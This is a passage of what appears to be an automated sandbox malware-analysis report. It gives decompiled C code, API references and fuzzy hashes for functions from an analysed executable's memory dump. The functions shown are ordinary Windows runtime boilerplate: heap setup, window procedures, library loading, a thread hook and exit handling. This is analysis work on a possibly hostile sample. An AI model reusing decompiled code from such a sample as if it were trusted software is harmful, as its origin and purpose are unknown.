                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3850602802-0
                                                                                                                            • Opcode ID: d8b0a3a19fa61d1a7cf909269492eb1c9957de3cd36b9813990acb6f6a96cf92
                                                                                                                            • Instruction ID: f9a9c840f0c272660c5102bcdc578a797847a56f784cfc1094dbbe4e38590b4a
                                                                                                                            • Opcode Fuzzy Hash: d8b0a3a19fa61d1a7cf909269492eb1c9957de3cd36b9813990acb6f6a96cf92
                                                                                                                            • Instruction Fuzzy Hash: FEF03735340A1057D2359769DC41F57B3E9BFD8700F00462DF6819B7D0D5B8FC428654
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00422863 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00422863(void* __ebx, void* __edx, void* __edi, intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;
				void* _t15;

				_t15 = __edx;
				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x444ac8 = _t6;
				if(_t6 != 0) {
					_t7 = E00422808(__ebx, _t15, __edi, __eflags);
					__eflags = _t7 - 3;
					 *0x446878 = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E00422A64(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x444ac8);
							 *0x444ac8 =  *0x444ac8 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}







                                                                                                                            0x00422863
                                                                                                                            0x00422874
                                                                                                                            0x0042287c
                                                                                                                            0x00422881
                                                                                                                            0x00422886
                                                                                                                            0x0042288b
                                                                                                                            0x0042288e
                                                                                                                            0x00422893
                                                                                                                            0x004228b9
                                                                                                                            0x004228bb
                                                                                                                            0x004228bc
                                                                                                                            0x00422895
                                                                                                                            0x0042289a
                                                                                                                            0x0042289f
                                                                                                                            0x004228a2
                                                                                                                            0x00000000
                                                                                                                            0x004228a4
                                                                                                                            0x004228aa
                                                                                                                            0x004228b0
                                                                                                                            0x00000000
                                                                                                                            0x004228b0
                                                                                                                            0x004228a2
                                                                                                                            0x00422883
                                                                                                                            0x00422883
                                                                                                                            0x00422885
                                                                                                                            0x00422885

                                                                                                                            APIs
                                                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,0041E4A6,00000001), ref: 00422874
                                                                                                                            • HeapDestroy.KERNEL32 ref: 004228AA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$CreateDestroy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3296620671-0
                                                                                                                            • Opcode ID: 3f5dfa520aa96acddddc6d8dc79ece1fa25df109ce6e4a5cc463207ef06614b3
                                                                                                                            • Instruction ID: beae4ad68168e0ff79797ae99b296c2d6e06c4f2e670489c875b2cad42b38e4b
                                                                                                                            • Opcode Fuzzy Hash: 3f5dfa520aa96acddddc6d8dc79ece1fa25df109ce6e4a5cc463207ef06614b3
                                                                                                                            • Instruction Fuzzy Hash: F5E06D74794321BAFBA47B31BE053263694FB81387F50063EF401D91A0E7A8C6809A0E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004085B4 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004085B4(intOrPtr* __ecx, int _a4, int _a8, long _a12) {
				_Unknown_base(*)()* _t11;
				long _t12;
				intOrPtr* _t17;

				_t17 = __ecx;
				_t11 =  *(__ecx + 0x40);
				if(_t11 != 0) {
					L3:
					_t12 = CallWindowProcA(_t11,  *(_t17 + 0x20), _a4, _a8, _a12); // executed
					return _t12;
				}
				_t11 =  *( *((intOrPtr*)( *__ecx + 0xf0))());
				if(_t11 != 0) {
					goto L3;
				}
				return DefWindowProcA( *(__ecx + 0x20), _a4, _a8, _a12);
			}






                                                                                                                            0x004085b8
                                                                                                                            0x004085ba
                                                                                                                            0x004085bf
                                                                                                                            0x004085e3
                                                                                                                            0x004085f0
                                                                                                                            0x00000000
                                                                                                                            0x004085f0
                                                                                                                            0x004085c9
                                                                                                                            0x004085cd
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • DefWindowProcA.USER32(?,?,?,?), ref: 004085DB
                                                                                                                            • CallWindowProcA.USER32 ref: 004085F0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcWindow$Call
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2316559721-0
                                                                                                                            • Opcode ID: 55312378205899a8cdaa2f680bdd353222dd56d5c8407c9bd0fd2595a749f90f
                                                                                                                            • Instruction ID: bffcb08cfe7967305fef7a0243cdf5e1be8992d37177c5cb5cf36db13b8b5e54
                                                                                                                            • Opcode Fuzzy Hash: 55312378205899a8cdaa2f680bdd353222dd56d5c8407c9bd0fd2595a749f90f
                                                                                                                            • Instruction Fuzzy Hash: 1CF0AC36100205FFCF115F94DC04DDA7BB9FF18391B048429FA85D6661DB76E920EB54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409EDA Relevance: 3.0, APIs: 2, Instructions: 18libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00409EDA(void* __ecx) {
				struct HINSTANCE__* _t11;
				signed int _t12;
				void* _t15;

				_t15 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_t11 = GetModuleHandleA( *(__ecx + 0xc)); // executed
					 *(_t15 + 4) = _t11;
					if(_t11 == 0) {
						_t12 = LoadLibraryA( *(_t15 + 0xc));
						 *(_t15 + 4) = _t12;
						 *((char*)(_t15 + 8)) = _t12 & 0xffffff00 | _t12 != 0x00000000;
					}
				}
				return  *(_t15 + 4);
			}






                                                                                                                            0x00409edb
                                                                                                                            0x00409ee1
                                                                                                                            0x00409ee6
                                                                                                                            0x00409eee
                                                                                                                            0x00409ef1
                                                                                                                            0x00409ef6
                                                                                                                            0x00409efe
                                                                                                                            0x00409f04
                                                                                                                            0x00409f04
                                                                                                                            0x00409ef1
                                                                                                                            0x00409f0b

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNELBASE(?,?,00409FBD,InitCommonControlsEx,00000000,0040A6C1,00040000,00008000,?,?,0040CD04,?,00040000,00000000,?), ref: 00409EE6
                                                                                                                            • LoadLibraryA.KERNEL32(?,?,00409FBD,InitCommonControlsEx,00000000,0040A6C1,00040000,00008000,?,?,0040CD04,?,00040000,00000000,?), ref: 00409EF6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleLibraryLoadModule
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4133054770-0
                                                                                                                            • Opcode ID: c391a952d12ae6614da37d023488935ed58e1e216297e91301f60e01424eb34f
                                                                                                                            • Instruction ID: 5d05217a45c6d5cac685415f437a9af489fa95a796938a418d899b991c22f30a
                                                                                                                            • Opcode Fuzzy Hash: c391a952d12ae6614da37d023488935ed58e1e216297e91301f60e01424eb34f
                                                                                                                            • Instruction Fuzzy Hash: F7E04630101B01DFC7209F24E804A43BBE8AF00B11B00C8BEE0AAD2A20D334E940CB04
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00405DE6 Relevance: 3.0, APIs: 2, Instructions: 15threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 86%
                                                                                                                            			E00405DE6(void* __esi, void* __eflags) {
				void* _t3;
				void* _t4;
				struct HHOOK__* _t6;
				void* _t7;
				void* _t8;

				_t3 = E0040706D(_t7, _t8, __esi, __eflags);
				_t13 =  *((char*)(_t3 + 0x14));
				if( *((char*)(_t3 + 0x14)) == 0) {
					_push(__esi);
					_t4 = E00406B4C(_t7, _t8, __esi, _t13);
					_t6 = SetWindowsHookExA(0xffffffff, E00405C52, 0, GetCurrentThreadId()); // executed
					 *(_t4 + 0x2c) = _t6;
					return _t6;
				}
				return _t3;
			}








                                                                                                                            0x00405de6
                                                                                                                            0x00405deb
                                                                                                                            0x00405def
                                                                                                                            0x00405df1
                                                                                                                            0x00405df2
                                                                                                                            0x00405e09
                                                                                                                            0x00405e0f
                                                                                                                            0x00000000
                                                                                                                            0x00405e12
                                                                                                                            0x00405e13

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentHookThreadWindows
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1904029216-0
                                                                                                                            • Opcode ID: 78c452b451afb60e8aba6cfd5c6db270b14a6f0f33e5ae018f699022678b9531
                                                                                                                            • Instruction ID: bc8e3921105f5761236f8f979a74ba6a36916ba2cc1f432ce222eb6778ada139
                                                                                                                            • Opcode Fuzzy Hash: 78c452b451afb60e8aba6cfd5c6db270b14a6f0f33e5ae018f699022678b9531
                                                                                                                            • Instruction Fuzzy Hash: 2BD0A7719087102EEB203B70BC09B0B3A50DB04B35F2103BAF511B61D1C6385A804F5E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041E0AD Relevance: 3.0, APIs: 2, Instructions: 5COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0041E0AD(int _a4) {

				E0041E087(_a4);
				ExitProcess(_a4);
			}



                                                                                                                            0x0041e0b1
                                                                                                                            0x0041e0bb

                                                                                                                            APIs
                                                                                                                            • ___crtCorExitProcess.LIBCMT ref: 0041E0B1
                                                                                                                              • Part of subcall function 0041E087: GetModuleHandleA.KERNEL32(mscoree.dll,0041E0B6,?,004229A2,000000FF,0000001E,0043D1A8,0000000C,00422A4C,4917EADC,?,4917EADC,0041DA00,00000004,0043D058,0000000C), ref: 0041E08C
                                                                                                                              • Part of subcall function 0041E087: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0041E09C
                                                                                                                            • ExitProcess.KERNEL32 ref: 0041E0BB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2427264223-0
                                                                                                                            • Opcode ID: a5f8a5c0c7a9f4c68c85982d694a7c512eea08f90cad1044d42cfbd57e4610a6
                                                                                                                            • Instruction ID: f0318020403ce54756b4982418d5a6e9d156bb0093556c41880ccfa4a6bafafa
                                                                                                                            • Opcode Fuzzy Hash: a5f8a5c0c7a9f4c68c85982d694a7c512eea08f90cad1044d42cfbd57e4610a6
                                                                                                                            • Instruction Fuzzy Hash: C2B01230004100BFC6052F11DD0B80D7FB1EF40703F00442DF048400748B715CA0BB05
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406B65 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 55%
                                                                                                                            			E00406B65(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t22;
				intOrPtr* _t39;
				intOrPtr* _t40;
				intOrPtr* _t41;
				intOrPtr* _t42;
				intOrPtr* _t47;
				signed int* _t52;
				intOrPtr _t54;
				void* _t55;

				_t37 = __ebx;
				_push(4);
				E0041E981(E00431329, __ebx, __edi, __esi);
				_t54 = __ecx;
				 *((intOrPtr*)(_t55 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x433e5c;
				_t39 =  *((intOrPtr*)(__ecx + 0x48));
				 *((intOrPtr*)(_t55 - 4)) = 1;
				if(_t39 != 0) {
					 *((intOrPtr*)( *_t39))(1);
				}
				_t40 =  *((intOrPtr*)(_t54 + 0x70));
				if(_t40 != 0) {
					_t48 = _t54 + 0x4c;
					 *((intOrPtr*)( *_t40 + 0xc))(_t54 + 0x4c);
					_t47 =  *((intOrPtr*)(_t54 + 0x70));
					if(_t47 != 0) {
						 *((intOrPtr*)( *_t47 + 4))(1);
					}
				}
				_t41 =  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x78))));
				if(_t41 != 0) {
					 *((intOrPtr*)( *_t41))(1);
				}
				_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x78)) + 4));
				_t61 = _t42;
				if(_t42 != 0) {
					 *((intOrPtr*)( *_t42))(1);
				}
				_push( *((intOrPtr*)(_t54 + 0x78)));
				E0040254C(_t37, _t48, 1, _t54, _t61);
				_t52 = _t54 + 0x80;
				_t22 =  *_t52;
				if(_t22 != 0 && _t22 != 0xffffffff) {
					_push(_t22); // executed
					E00406872(); // executed
					 *_t52 =  *_t52 | 0xffffffff;
				}
				 *((char*)(_t55 - 4)) = 0;
				E0040E856(_t54 + 0x74);
				return E0041EA59(E00402C55( *((intOrPtr*)(_t54 + 0x34)) - 0x10, _t48));
			}












                                                                                                                            0x00406b65
                                                                                                                            0x00406b65
                                                                                                                            0x00406b6c
                                                                                                                            0x00406b71
                                                                                                                            0x00406b73
                                                                                                                            0x00406b76
                                                                                                                            0x00406b7c
                                                                                                                            0x00406b84
                                                                                                                            0x00406b87
                                                                                                                            0x00406b8c
                                                                                                                            0x00406b8c
                                                                                                                            0x00406b8e
                                                                                                                            0x00406b93
                                                                                                                            0x00406b97
                                                                                                                            0x00406b9b
                                                                                                                            0x00406b9e
                                                                                                                            0x00406ba3
                                                                                                                            0x00406ba8
                                                                                                                            0x00406ba8
                                                                                                                            0x00406ba3
                                                                                                                            0x00406bae
                                                                                                                            0x00406bb2
                                                                                                                            0x00406bb7
                                                                                                                            0x00406bb7
                                                                                                                            0x00406bbc
                                                                                                                            0x00406bbf
                                                                                                                            0x00406bc1
                                                                                                                            0x00406bc6
                                                                                                                            0x00406bc6
                                                                                                                            0x00406bc8
                                                                                                                            0x00406bcb
                                                                                                                            0x00406bd0
                                                                                                                            0x00406bd6
                                                                                                                            0x00406bdb
                                                                                                                            0x00406be2
                                                                                                                            0x00406be3
                                                                                                                            0x00406be8
                                                                                                                            0x00406be8
                                                                                                                            0x00406bee
                                                                                                                            0x00406bf2
                                                                                                                            0x00406c07

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog3
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 431132790-0
                                                                                                                            • Opcode ID: 1108d65650e23286a11c5b638a1353b040500a30afb79dcccb45ee011b31e5ce
                                                                                                                            • Instruction ID: fab39e2af674850a583cb773b6256394ab539c1bb4c198198cf44d0a4af59a73
                                                                                                                            • Opcode Fuzzy Hash: 1108d65650e23286a11c5b638a1353b040500a30afb79dcccb45ee011b31e5ce
                                                                                                                            • Instruction Fuzzy Hash: FE215E74201A11CFDB24EF6AC494A2AB7F0BF49714715456EE567DB7A0CB38F811DB04
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401110 Relevance: 1.5, APIs: 1, Instructions: 31windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 68%
                                                                                                                            			E00401110(void* __ebx, void* __edi, void* __ebp, intOrPtr* _a4) {
				char _v12;
				intOrPtr _v20;
				void* __esi;
				signed int _t8;
				struct HICON__* _t15;
				intOrPtr* _t23;
				signed int _t26;

				_push(0xffffffff);
				_push(E00432238);
				_push( *[fs:0x0]);
				_t8 =  *0x441590; // 0x4917eadc
				_t9 = _t8 ^ _t26;
				_push(_t8 ^ _t26);
				 *[fs:0x0] =  &_v12;
				_t23 = _a4;
				E0040486A(_t23, 0x66, 0);
				_v12 = 0;
				 *_t23 = 0x438654;
				E0040706D(__ebx, __edi, _t23, _t9);
				_t15 = LoadIconA( *(E0040706D(__ebx, __edi, _t23, _t9) + 0xc), 0x80); // executed
				 *(_t23 + 0x74) = _t15;
				 *[fs:0x0] = _v20;
				return _t23;
			}










                                                                                                                            0x00401110
                                                                                                                            0x00401112
                                                                                                                            0x0040111d
                                                                                                                            0x0040111f
                                                                                                                            0x00401124
                                                                                                                            0x00401126
                                                                                                                            0x0040112b
                                                                                                                            0x00401131
                                                                                                                            0x0040113b
                                                                                                                            0x00401140
                                                                                                                            0x00401148
                                                                                                                            0x0040114e
                                                                                                                            0x00401161
                                                                                                                            0x00401167
                                                                                                                            0x00401170
                                                                                                                            0x0040117c

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040486A: _memset.LIBCMT ref: 00404881
                                                                                                                            • LoadIconA.USER32(?,00000080), ref: 00401161
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IconLoad_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1883059454-0
                                                                                                                            • Opcode ID: cb5c0b2ac1c335e1d01516814efdd0d2a1ff6842bc8125eda594bd715ed8be72
                                                                                                                            • Instruction ID: 9de744f8da80fc1dc67f4e826b5e220a5866867b32ae30c2dcb137f2bc861890
                                                                                                                            • Opcode Fuzzy Hash: cb5c0b2ac1c335e1d01516814efdd0d2a1ff6842bc8125eda594bd715ed8be72
                                                                                                                            • Instruction Fuzzy Hash: E0F090B6A48740AFC300DF24C842B4AB7E4FB48F20F008A2EF591A73D0D779A5048B5A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040A8BA Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040A8BA(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				void* __esi;
				void* __ebp;
				void* _t10;
				long _t11;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HWND__* _t18;

				if(_a8 != 0x360) {
					_t18 = _a4;
					_t10 = E0040A1A3(_t14, _t15, _t16, _t18, __eflags, _t18);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						_t11 = DefWindowProcA(_t18, _a8, _a12, _a16);
						L6:
						return _t11;
					}
					__eflags =  *((intOrPtr*)(_t10 + 0x20)) - _t18;
					if(__eflags != 0) {
						goto L5;
					}
					_t11 = E0040A7CD(_t14, _t16, _t18, __eflags, _t10, _t18, _a8, _a12, _a16); // executed
					goto L6;
				}
				return 1;
			}











                                                                                                                            0x0040a8c4
                                                                                                                            0x0040a8cc
                                                                                                                            0x0040a8d0
                                                                                                                            0x0040a8d5
                                                                                                                            0x0040a8d7
                                                                                                                            0x0040a8f0
                                                                                                                            0x0040a8fa
                                                                                                                            0x0040a900
                                                                                                                            0x00000000
                                                                                                                            0x0040a900
                                                                                                                            0x0040a8d9
                                                                                                                            0x0040a8dc
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040a8e9
                                                                                                                            0x00000000
                                                                                                                            0x0040a8e9
                                                                                                                            0x00000000

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9633c9904eef36d0d74b00ed65f1a31da7496f65b408ba0850f19666a4322909
                                                                                                                            • Instruction ID: 810ed4855a9f73cfde5c1df3ae68b8f9fb80e71b95530f1a66fccad3955a96e0
                                                                                                                            • Opcode Fuzzy Hash: 9633c9904eef36d0d74b00ed65f1a31da7496f65b408ba0850f19666a4322909
                                                                                                                            • Instruction Fuzzy Hash: 5DF0F832110319BFCF126E919C04DEB3B69AF08351F04C436FA15A5191C739D571ABAB
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00402670 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: dc1d304b526099863b724d3003991f449edaf9a8f4a9c1430c5fcfa778f26dd4
                                                                                                                            • Instruction ID: 258495d387618a3e4e2dbca797fd3dfccbb6cf0ef9e6815e67eb57b8b8604316
                                                                                                                            • Opcode Fuzzy Hash: dc1d304b526099863b724d3003991f449edaf9a8f4a9c1430c5fcfa778f26dd4
                                                                                                                            • Instruction Fuzzy Hash: EBE08635104212ABCE204E3499142A773D09F22330F215F3FE8B0E22D0D2BA8CD2AF5A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409E61 Relevance: 1.5, APIs: 1, Instructions: 14windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00409E61(void* __ecx, intOrPtr _a4) {
				signed int _t9;
				int _t12;

				 *((intOrPtr*)(__ecx + 0x44)) = _a4;
				_t9 =  *(__ecx + 0x3c);
				if((_t9 & 0x00000010) != 0) {
					 *(__ecx + 0x3c) = _t9 & 0xffffffef;
					_t12 = PostMessageA( *(__ecx + 0x20), 0, 0, 0); // executed
					return _t12;
				}
				return _t9;
			}





                                                                                                                            0x00409e65
